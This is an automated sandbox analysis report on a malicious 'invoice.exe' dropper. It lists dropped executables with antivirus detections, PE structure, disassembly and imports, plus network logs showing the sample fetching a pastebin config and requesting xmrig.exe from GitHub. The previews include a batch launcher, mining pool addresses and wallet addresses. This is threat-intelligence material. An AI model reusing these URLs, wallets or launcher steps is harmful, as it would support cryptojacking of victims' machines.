                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="486168" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):2232
                                Entropy (8bit):5.3785452578096224
                                Encrypted:false
                                SSDEEP:48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZmUyus:fLHyIFKL3IZ2KRH9Ouggs
                                MD5:0B7FBAAF2958D626E9E18D8EA143F65E
                                SHA1:DA0CBF5CCDF1A6903F0B599C52149329C8BD0C4A
                                SHA-256:0C8F80A793D13EBDBC0BF9527F4DA1EB7C2CCE7C72902B2D88E4B28A6F76B5A0
                                SHA-512:3C0F7ADE5B1436382F41BCEE13ECB724B943CA67FC4A69432610B05BF0049641194131E26984C086BBCB678216A256897696110330E42AA3891208E7BB5EEA38
                                Malicious:false
                                Process:C:\Users\user\Desktop\invoice.exe
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):3555328
                                Entropy (8bit):1.0341658078917435
                                Encrypted:false
                                SSDEEP:6144:CGoJoXgGI1e6sQayFAOaIicmsSsx1iT+QOQ86/zq:5oJoXgdYQn6cLr++QR8k
                                MD5:B154114F2D13496DC9630CAC4E707672
                                SHA1:ADE072FEA73E4F76C073E17BB75DC2D13B275919
                                SHA-256:72D79FB5CFD43477A78468976FA015486F13504F36315379CCD3EDE0E84B3DDB
                                SHA-512:DFD8FEF8EEA701B017B935B62F99F306A9BA9ADFD9A5FE0A5C18346B2E6CC432AF62DDA2638DED60C5D09B1B53FE8E75D1C5AAC4D9F6CAC6306A3A3CBBBFB8AF
                                Malicious:true
                                Antivirus:
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 83%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Jo...............e......e.......e.....nt.....nt......e...........nt.._...jt......jt.....Rich............................PE..L.....dd............... .....Z.......v............@...........................6...........@.....................................<............................@..l...(...............................h...@...............X............................text............................... ..`.rdata..............................@..@.data...Xl.......^..................@....reloc..l....@......................@..B.aliz1...A...`...B...8................@P.aliz1...A.......B...z................@P.aliz1...A.......B....................@P.aliz1...A...P*..B....)...............@P................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\invoice.exe
                                File Type:DOS batch file, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):85
                                Entropy (8bit):4.343204656270956
                                Encrypted:false
                                SSDEEP:3:mKDDQjZmRVVcFv0dAHlRgvYoU:hENmRVCFMdAt
                                MD5:A1099E439C142789FF2183C18F77CDCA
                                SHA1:F7EFCCA92B6138C091C926277D5C29DFEFE0872E
                                SHA-256:8FD34FEB39582F009552D460E8D24539DD00BB1251F2E721277FB3559C998917
                                SHA-512:7BC34150F5662589F6D16803716DEB7974C56E4665907BD7E2A4337C6E9397603B3A8D9E4F8F64C5BBB4C948C168843555FCC744F86EB932CDDB3D94AF6B7CDC
                                Malicious:false
                                Preview:@echo off..for /f "tokens=*" %%a in ('dir /b "*.exe"') do (.. start /b "" "%%a"..)
                                Process:C:\Users\user\Desktop\invoice.exe
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):6004224
                                Entropy (8bit):4.279748667922797
                                Encrypted:false
                                SSDEEP:24576:yL9LDCoI9KzJSHvh2Lwtp0E8bn/XDtYp0KGfvJPDovMXF7lOXrtQ4bFE:e9nCoI9KwpH8hLTXF7lOXp
                                MD5:D076D83093CF70D43AE8202CB9603D0D
                                SHA1:4DF9ED4524474C5108453453DCFE837AA148B761
                                SHA-256:F84056220C4D155CCD53C681575DF2C05185FDFDF17780A1F3722CC6F10F0C30
                                SHA-512:B7C38277D614DFE5C28DD61D7289C9B3D306E51811DF1237CCF8ECB851C9A20692F6FE9641F367B507B87340AD96C8617E95DD60E954BD6D63AA0E4780317310
                                Malicious:true
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 88%
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Jo...............e......e.......e.....nt.....nt......e...........nt.._...jt......jt.....Rich............................PE..L...>.dd............... ......(......v............@...........................\...........@.....................................<.............................*.l...(...............................h...@...............X............................text............................... ..`.rdata..............................@..@.data.....'.......'.................@....reloc..l.....*......z*.............@..B.aliz1...A....*..B....*...............@P.aliz1...A....7..B....6...............@P.aliz1...A...`C..B....C...............@P.aliz1...A....O..B...\O...............@P................................................................................................................................................................................
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):345
                                Entropy (8bit):5.7081731137089875
                                Encrypted:false
                                SSDEEP:6:DiYgE/ovRhBFqGTUhKliYgE/ovRhBFqGTUhKSI7wKd/cwEJPDdVsYQnKfaHTPOxR:uwgphTlMxwgphTlMA7cwo7LS9jqgq2Ah
                                MD5:0A686F03494576F1204E65653BCE54BF
                                SHA1:22FAA860EC67A432ED3B6829939B5F6353139BC4
                                SHA-256:E93E709DA2BF600012DF6FA6BEE9775C42C337501C485757F3A7BCA17C135D7D
                                SHA-512:EEA7C9A97657EF872D777504C1A5981437493C940B745EFAAE8D521877862398EDFB4FFD49D79D434AF5D12F2433DA605EA2959858CC1858B40098C768E66253
                                Malicious:false
                                Preview:ETCHASH..etc.2miners.com:1010..0x3CDd8bD2585d5ad6C952De241E0E91D4C85d3Fe4..ETCHASH..etc.2miners.com:1010..0x3CDd8bD2585d5ad6C952De241E0E91D4C85d3Fe4..XMR..xmr-eu1.nanopool.org:14433..4ABgk8FGE9UaEq9uhKpc9sMMfHouAgzvXeLJy8MmydhZMM8bWoTDuDWGj5bboFKWMzTcTfhaVhQ1zLbvrKUR9kjvA69WX8K..S1lent_Hash..S1lent_Hash..cp..https://pastebin.com/raw/PTNbBX9V..
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:MS Windows registry file, NT/2000 or above
                                Category:dropped
                                Size (bytes):1835008
                                Entropy (8bit):4.468278001140912
                                Encrypted:false
                                SSDEEP:6144:+IXfpi67eLPU9skLmb0b4PWSPKaJG8nAgejZMMhA2gX4WABl0uN5dwBCswSbz:TXD94PWlLZMM6YFHf+z
                                MD5:D415CE45F75CB9E378956B0F671E89FB
                                SHA1:3B2404AACEF576F361EC751743EE6949108EAAA6
                                SHA-256:7B68528B2EBFAA8D0254A729C0A3489AD16E211F448ADEB18D9A774F9B02D970
                                SHA-512:21B488D2C6BDA78A91716A8F7226AB7B1A11BE7CEA01AFF20D9FF4FFB3180E2ED5A9872336011F2EACD5609C5C61CD788FB79192543153452AE85578A98F6E9E
                                Malicious:false
                                Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..W.$...............................................................................................................................................................................................................................................................................................................................................dl@.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:modified
                                Size (bytes):345
                                Entropy (8bit):5.7081731137089875
                                Encrypted:false
                                SSDEEP:6:DiYgE/ovRhBFqGTUhKliYgE/ovRhBFqGTUhKSI7wKd/cwEJPDdVsYQnKfaHTPOxR:uwgphTlMxwgphTlMA7cwo7LS9jqgq2Ah
                                MD5:0A686F03494576F1204E65653BCE54BF
                                SHA1:22FAA860EC67A432ED3B6829939B5F6353139BC4
                                SHA-256:E93E709DA2BF600012DF6FA6BEE9775C42C337501C485757F3A7BCA17C135D7D
                                SHA-512:EEA7C9A97657EF872D777504C1A5981437493C940B745EFAAE8D521877862398EDFB4FFD49D79D434AF5D12F2433DA605EA2959858CC1858B40098C768E66253
                                Malicious:false
                                Preview:ETCHASH..etc.2miners.com:1010..0x3CDd8bD2585d5ad6C952De241E0E91D4C85d3Fe4..ETCHASH..etc.2miners.com:1010..0x3CDd8bD2585d5ad6C952De241E0E91D4C85d3Fe4..XMR..xmr-eu1.nanopool.org:14433..4ABgk8FGE9UaEq9uhKpc9sMMfHouAgzvXeLJy8MmydhZMM8bWoTDuDWGj5bboFKWMzTcTfhaVhQ1zLbvrKUR9kjvA69WX8K..S1lent_Hash..S1lent_Hash..cp..https://pastebin.com/raw/PTNbBX9V..
                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):10
                                Entropy (8bit):2.1709505944546685
                                Encrypted:false
                                SSDEEP:3:BXxX2Xn:hxg
                                MD5:5BFA42CC537113132361E5365E83890F
                                SHA1:061959C59F11674A488E276B1024E9ED4F9C60B4
                                SHA-256:5C4D51FD2BF2841C3B7396C88957FC96FC05283FB15F78D92693FB7EE901B430
                                SHA-512:726A7D4940EAEEE129B1DCDD1234007CA3CF2B1A3E5CFE233D9FF8D7E9B2E02A9B764C355C5EB4DAB654036CA1F9EEF067AFFAC4BDBA3AD48628368FE4D398B3
                                Malicious:false
                                Preview:5124532452
                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):7.845513575891335
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:invoice.exe
                                File size:1'262'619 bytes
                                MD5:6af6a7fac1197a9b12b28c0e4db8c18a
                                SHA1:357ae7d706de393d8743dbbe0d94bc87922643cf
                                SHA256:d0a2035c0431796c138a26d1c9a75142b613c5417dc96a9200723870d0b3a687
                                SHA512:6a89fbff98be91a89008830f7aa3f88ef8fcd4c9967d1443abda4bad71097f6abc6a1371e0767e8853a3e52bd4e3f944f4ccbb7f8173d06d7c777bc71823f899
                                SSDEEP:24576:2TbBv5rUyXVTW6Hq69NuPQPyUfezTtJiC7nVUriVGAQ+hw17tq:IBJTzHqBQrW3tEwnGtdCOBq
                                TLSH:E7451241BAC1D4B2D5630C326B695B21A83C7D202F25CEEF53D06E5EDA316D0EB35B62
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.
                                Icon Hash:1515d4d4442f2d2d
                                Entrypoint:0x41f530
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:5
                                OS Version Minor:1
                                File Version Major:5
                                File Version Minor:1
                                Subsystem Version Major:5
                                Subsystem Version Minor:1
                                Import Hash:12e12319f1029ec4f8fcbed7e82df162
                                Instruction
                                call 00007F66BCD064CBh
                                jmp 00007F66BCD05DDDh
                                int3
                                int3
                                int3
                                int3
                                int3
                                int3
                                push ebp
                                mov ebp, esp
                                push esi
                                push dword ptr [ebp+08h]
                                mov esi, ecx
                                call 00007F66BCCF8C27h
                                mov dword ptr [esi], 004356D0h
                                mov eax, esi
                                pop esi
                                pop ebp
                                retn 0004h
                                and dword ptr [ecx+04h], 00000000h
                                mov eax, ecx
                                and dword ptr [ecx+08h], 00000000h
                                mov dword ptr [ecx+04h], 004356D8h
                                mov dword ptr [ecx], 004356D0h
                                ret
                                int3
                                int3
                                int3
                                int3
                                int3
                                int3
                                int3
                                int3
                                int3
                                int3
                                int3
                                int3
                                int3
                                push ebp
                                mov ebp, esp
                                push esi
                                mov esi, ecx
                                lea eax, dword ptr [esi+04h]
                                mov dword ptr [esi], 004356B8h
                                push eax
                                call 00007F66BCD0926Fh
                                test byte ptr [ebp+08h], 00000001h
                                pop ecx
                                je 00007F66BCD05F6Ch
                                push 0000000Ch
                                push esi
                                call 00007F66BCD05529h
                                pop ecx
                                pop ecx
                                mov eax, esi
                                pop esi
                                pop ebp
                                retn 0004h
                                push ebp
                                mov ebp, esp
                                sub esp, 0Ch
                                lea ecx, dword ptr [ebp-0Ch]
                                call 00007F66BCCF8BA2h
                                push 0043BEF0h
                                lea eax, dword ptr [ebp-0Ch]
                                push eax
                                call 00007F66BCD08D29h
                                int3
                                push ebp
                                mov ebp, esp
                                sub esp, 0Ch
                                lea ecx, dword ptr [ebp-0Ch]
                                call 00007F66BCD05EE8h
                                push 0043C0F4h
                                lea eax, dword ptr [ebp-0Ch]
                                push eax
                                call 00007F66BCD08D0Ch
                                int3
                                jmp 00007F66BCD0A7A7h
                                int3
                                int3
                                int3
                                int3
                                push 00422900h
                                push dword ptr fs:[00000000h]
                                Programming Language:
                                • [ C ] VS2008 SP1 build 30729
                                • [IMP] VS2008 SP1 build 30729
                                 Name | Virtual Address | Virtual Size | Is in Section
                                 IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3d070 | 0x34 | .rdata
                                 IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3d0a4 | 0x50 | .rdata
                                 IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x64000 | 0xdff8 | .rsrc
                                 IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                 IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                 IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x72000 | 0x233c | .reloc
                                 IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3b11c | 0x54 | .rdata
                                 IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                 IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                 IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                 IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x355f8 | 0x40 | .rdata
                                 IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                 IMAGE_DIRECTORY_ENTRY_IAT | 0x33000 | 0x278 | .rdata
                                 IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3c5ec | 0x120 | .rdata
                                 IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                 IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                 Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                 .text | 0x1000 | 0x31bdc | 0x31c00 | 2831bb8b11e3209658a53131886cdf98 | False | 0.5909380888819096 | data | 6.712962136932442 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                 .rdata | 0x33000 | 0xaec0 | 0xb000 | 042f11346230ca5aa360727d9908e809 | False | 0.4579190340909091 | data | 5.261605615899847 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                 .data | 0x3e000 | 0x24720 | 0x1000 | 9670b581969e508258d8bc903025de5e | False | 0.451416015625 | data | 4.387459135575936 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                 .didat | 0x63000 | 0x190 | 0x200 | c83554035c63bb446c6208d0c8fa0256 | False | 0.4453125 | data | 3.3327310103022305 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                 .rsrc | 0x64000 | 0xdff8 | 0xe000 | ba08fbcd0ed7d9e6a268d75148d9914b | False | 0.6373639787946429 | data | 6.638661032196024 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                 .reloc | 0x72000 | 0x233c | 0x2400 | 40b5e17755fd6fdd34de06e5cdb7f711 | False | 0.7749565972222222 | data | 6.623012966548067 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                 Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                 PNG | 0x64650 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528
                                 PNG | 0x65198 | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495
                                 RT_ICON | 0x66748 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.47832369942196534
                                 RT_ICON | 0x66cb0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.5410649819494585
                                 RT_ICON | 0x67558 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.4933368869936034
                                 RT_ICON | 0x68400 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m | English | United States | 0.5390070921985816
                                 RT_ICON | 0x68868 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m | English | United States | 0.41393058161350843
                                 RT_ICON | 0x69910 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m | English | United States | 0.3479253112033195
                                 RT_ICON | 0x6beb8 | 0x3d71 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9809269502193401
                                 RT_DIALOG | 0x70588 | 0x286 | data | English | United States | 0.5092879256965944
                                 RT_DIALOG | 0x70358 | 0x13a | data | English | United States | 0.60828025477707
                                 RT_DIALOG | 0x70498 | 0xec | data | English | United States | 0.6991525423728814
                                 RT_DIALOG | 0x70228 | 0x12e | data | English | United States | 0.5927152317880795
                                 RT_DIALOG | 0x6fef0 | 0x338 | data | English | United States | 0.45145631067961167
                                 RT_DIALOG | 0x6fc98 | 0x252 | data | English | United States | 0.5757575757575758
                                 RT_STRING | 0x70f68 | 0x1e2 | data | English | United States | 0.3900414937759336
                                 RT_STRING | 0x71150 | 0x1cc | data | English | United States | 0.4282608695652174
                                 RT_STRING | 0x71320 | 0x1b8 | data | English | United States | 0.45681818181818185
                                 RT_STRING | 0x714d8 | 0x146 | data | English | United States | 0.5153374233128835
                                 RT_STRING | 0x71620 | 0x46c | data | English | United States | 0.3454063604240283
                                 RT_STRING | 0x71a90 | 0x166 | data | English | United States | 0.49162011173184356
                                 RT_STRING | 0x71bf8 | 0x152 | data | English | United States | 0.5059171597633136
                                 RT_STRING | 0x71d50 | 0x10a | data | English | United States | 0.49624060150375937
                                 RT_STRING | 0x71e60 | 0xbc | data | English | United States | 0.6329787234042553
                                 RT_STRING | 0x71f20 | 0xd6 | data | English | United States | 0.5747663551401869
                                 RT_GROUP_ICON | 0x6fc30 | 0x68 | data | English | United States | 0.7019230769230769
                                 RT_MANIFEST | 0x70810 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3957333333333333
                                 DLL | Import
                                 KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
                                 OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear
                                 gdiplus.dll | GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
                                 Language of compilation system | Country where language is spoken | Map
                                 English | United States |
                                 Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                 2024-09-05T01:45:44.734072+0200 | 2829056 | ETPRO MALWARE Observed Request for xmrig.exe in - Coinminer Download | 2 | 192.168.2.4 | 49739 | 140.82.121.3 | 443 | TCP
                                TCP packets (Timestamp, Source Port, Dest Port, Source IP, Dest IP): per-packet capture list not reproduced
                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                Sep 5, 2024 01:45:42.536009073 CEST | 52603 | 53 | 192.168.2.4 | 1.1.1.1
                                Sep 5, 2024 01:45:42.542614937 CEST | 53 | 52603 | 1.1.1.1 | 192.168.2.4
                                Sep 5, 2024 01:45:43.608691931 CEST | 56662 | 53 | 192.168.2.4 | 1.1.1.1
                                Sep 5, 2024 01:45:43.615386963 CEST | 53 | 56662 | 1.1.1.1 | 192.168.2.4
                                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                Sep 5, 2024 01:45:42.536009073 CEST | 192.168.2.4 | 1.1.1.1 | 0xb628 | Standard query (0) | pastebin.com | A (IP address) | IN (0x0001) | false
                                Sep 5, 2024 01:45:43.608691931 CEST | 192.168.2.4 | 1.1.1.1 | 0xc15c | Standard query (0) | github.com | A (IP address) | IN (0x0001) | false
                                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                Sep 5, 2024 01:45:42.542614937 CEST | 1.1.1.1 | 192.168.2.4 | 0xb628 | No error (0) | pastebin.com |  | 172.67.19.24 | A (IP address) | IN (0x0001) | false
                                Sep 5, 2024 01:45:42.542614937 CEST | 1.1.1.1 | 192.168.2.4 | 0xb628 | No error (0) | pastebin.com |  | 104.20.3.235 | A (IP address) | IN (0x0001) | false
                                Sep 5, 2024 01:45:42.542614937 CEST | 1.1.1.1 | 192.168.2.4 | 0xb628 | No error (0) | pastebin.com |  | 104.20.4.235 | A (IP address) | IN (0x0001) | false
                                Sep 5, 2024 01:45:43.615386963 CEST | 1.1.1.1 | 192.168.2.4 | 0xc15c | No error (0) | github.com |  | 140.82.121.3 | A (IP address) | IN (0x0001) | false
                                • pastebin.com
                                • github.com
                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.449737172.67.19.24443104280C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                Timestamp | Bytes transferred | Direction | Data
                                2024-09-04 23:45:43 UTC | 74 | OUT | GET /raw/PTNbBX9V HTTP/1.1
                                Host: pastebin.com
                                Connection: Keep-Alive
                                2024-09-04 23:45:43 UTC | 445 | IN | HTTP/1.1 404 Not Found
                                Date: Wed, 04 Sep 2024 23:45:43 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                x-frame-options: DENY
                                x-frame-options: DENY
                                x-content-type-options: nosniff
                                x-content-type-options: nosniff
                                x-xss-protection: 1;mode=block
                                x-xss-protection: 1;mode=block
                                cache-control: public, max-age=1801
                                CF-Cache-Status: HIT
                                Age: 636
                                Server: cloudflare
                                CF-RAY: 8be1dad5ac6f7d1a-EWR
                                2024-09-04 23:45:43 UTC | 699 | IN | Data Raw: 32 62 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 30 2e 37 35 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 79 65 73 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 73 74 65 62 69 6e 2e
                                Data Ascii: 2b4<!DOCTYPE html><html lang="en"><head> <meta name="viewport" content="width=device-width, initial-scale=0.75, maximum-scale=1.0, user-scalable=yes" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Pastebin.
                                2024-09-04 23:45:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.449739140.82.121.3443104280C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                TimestampBytes transferredDirectionData
                                2024-09-04 23:45:44 UTC95OUTGET /S1lentHash/xmrig/raw/main/xmrig.exe HTTP/1.1
                                Host: github.com
                                Connection: Keep-Alive
                                2024-09-04 23:45:44 UTC473INHTTP/1.1 404 Not Found
                                Server: GitHub.com
                                Date: Wed, 04 Sep 2024 23:45:44 GMT
                                Content-Type: text/html; charset=utf-8
                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                Cache-Control: no-cache
                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
